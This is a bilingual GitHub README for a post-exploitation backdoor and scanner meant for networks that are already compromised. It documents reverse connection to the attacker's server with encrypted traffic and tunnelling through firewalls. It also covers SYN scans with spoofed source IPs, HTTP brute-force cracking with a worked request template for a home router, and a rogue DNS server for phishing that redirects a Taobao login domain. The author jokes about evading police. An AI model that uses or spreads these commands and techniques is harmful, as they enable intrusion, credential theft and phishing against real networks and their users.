Skip to content

This is a backdoor about discover network device ,and it can hidden reverse connecting the hacker's server with encrypt commuication 后渗透后门程序,适合在已经攻陷的内网中做下一步的网络信息扫描..

Notifications You must be signed in to change notification settings

lcatro/network_backdoor_scanner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
 
 
 
 
 
 
 
 

Repository files navigation

scanner_framework

中文: 网络探测框架,适用于入侵到内网探测其它网络设备,探测器具有体积小,功能多,而且带有反向连接从内网穿透出外网连接控制终端,通信数据采用动态加密,再也不怕警察叔叔知道我在干坏事儿啦,为了方便破解一些弱口令设备,内部带有在线破解功能(暂时支持HTTP 破解).如果觉得这些功能满足不了需求,可以使用端口映射把你需要的工具直接通过隧道对接到内网的某台指定的主机端口上进行扫描.. -- LCatro

English: This is an internal network scanner like meterpreter .I will create more function into it scanner (now include many basic network scanner and network crack [like BurpSuite,crack HTTP]).Reverse connect function is to facilitate the attacker management hacked machine and crypte communication.Tunnel connect help your attack process's network flow crossing the firewall of internal network.


###启动方式 [How to launch it ] scanner.exe 控制台启动 [Launch it by console]
scanner.exe -bind [%port%] 绑定端口,远程访问 [Bind a local port for waitting you to connect it]
scanner.exe -recon %ip% [%port%] 反向连接,远程访问,默认是80,注意记得先启动reverse_server ,不然scanner.exe 不能成功连接 [Reverse connect to specify ip,WARNING!Remenber launch reverse_server first and then using this parameter launch scanner.exe]

###使用方法 [How to use it ] 扫描当前网段存活的主机,并且自动搜集数据 [using ARP request to query live machine in current network]
using:arp
获取当前主机的网络信息 [get this machine's information]
using:local
测试主机是否连通 [ping ..you most know it ..]
using:ping %ip/host%
TCP SYN 扫描主机 [tcp syn scan,set -P scanner will testing port,set -F is fake a ip for hide itsalf in attack flow]
using:scan %ip% [-P:[port1,port2,port3,...]] [-F:[fake_ip1,fake_ip2,...]]
洪水攻击主机 [dont use it ,because you will expose,so i never develop this function]
using:flood %ip% [-P:[port1,...]] [-F:[fake_ip1,...]]
在线破解 [online crack]
using:crack %ip% %port% [%user_dictionary_path% %password_dictionary_path%]
路由跟踪 [tracert route]
using:tracert %ip/host%
抓取页面 [get a HTML page on server]
using:getpage %ip% [-PORT:%port%] [-PATH:%path%]
启动端口转发功能 [tunnal port]
using:route -R:[%remote_ip%,%remote_port%] -L:[[%local_ip%,]%local_port%]
启动DNS 服务器 [dns server]
using:dns [run|start] | add %host% %ip% | delete %ip%
获取外网IP 地址和粗略定位 [get internet ip no is internal network ip and get the location]
using:ip
显示帮助 [show help]
using:help
退出 [exit scanner]
using:quit


###在线破解 [About Online Crack]

在线破解功能原理是通过自己构造特定的HTTP 数据包然后程序根据字典穷举测试出帐号密码

什么是表达式?

表达式的意思是给程序一个填充数据的框架,在接下来的穷举测试中会根据表达式内的关键字来填充数据,下面是在线破解的例子:

本地网络192.168.1.103:80 启用了PHP 服务器,在探测器里面输入破解命令

crack 192.168.1.103 80

然后会提示输入表达式

input your crack express:

输入数据包数据: POST http://192.168.1.103:80/api/analays.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Referer: http://192.168.1.103/api/analays.php
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.103
Content-length: %length%
Pragma: no-cache

user=%username%&pass=%password%

其中Content-length: %length% 的意思是让程序自动在此填充上下文的大小[因为这个长度是会变化的],%username% 和%password% 就是自动填充用户名和密码
[这里也可以不需要全部都用,比如破解水星路由器,直接填%password% 即可启动]
最后输入来确认数据包填写完成,如果中间某个位置出现填写错误就输入来重新填写破解数据包,下面的输入成功判断条件也是同理..

input your check term:

输入成功判断条件,由于经过测试,如果输入密码成功的话,页面会返回一个包含Success 的字符串,然后把他作为破解成功的测试条件..
Success

now cracking!

network crack - target:192.168.1.103:80
username:root password:toor

破解完成

表达式函数:

base64(%string%) -- 采用base64 编码
time() -- 获取系统时间
len(%string%) -- 统计字符串长度
rnd([%low%-%up%]) -- 在%low% 到%up% 之间生成随机数

Example :

破解水星的数据包 (其它都差不多,关键在Cookie):

Cookie: a2404_pages=10; a2404_times=5; Authorization=Basic%20base64(admin:%password%)

接下来会把%password% 先填充好之后再编码base64

WARNING! 由于水平问题还做不出递归,请见谅 ..


####DNS 服务器 [About DNS Server]

DNS 服务器是针对内网的信息钓鱼,比如通过伪造的站点来钓得更多的个人信息或者欺骗应用程序更新,如果上面的用法还不太明白的话可以看这里 [DNS server usualy use redirecting to phishing sites]

dns run 启动DNS 服务器 [run dns server]
dns exit 退出DNS 服务器 [exit dns server]
dns add m.login.taobao.com 127.0.0.1 把淘宝的手机登陆域名绑定到本地IP [point m.login.taobao.com to localhost via dns setting]
dns delete www.baidu.com 删除DNS 查询项目 [delete this record]


####端口转发原理 [tunnal port design] ####image


###Other

#####reverse_server 是用来做反向连接用的服务端

#####scanner.exe -bind 参数启动程序需要自己主动连过去,但是客户端还没写,也没什么需求,以后慢慢来..

About

This is a backdoor about discover network device ,and it can hidden reverse connecting the hacker's server with encrypt commuication 后渗透后门程序,适合在已经攻陷的内网中做下一步的网络信息扫描..

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published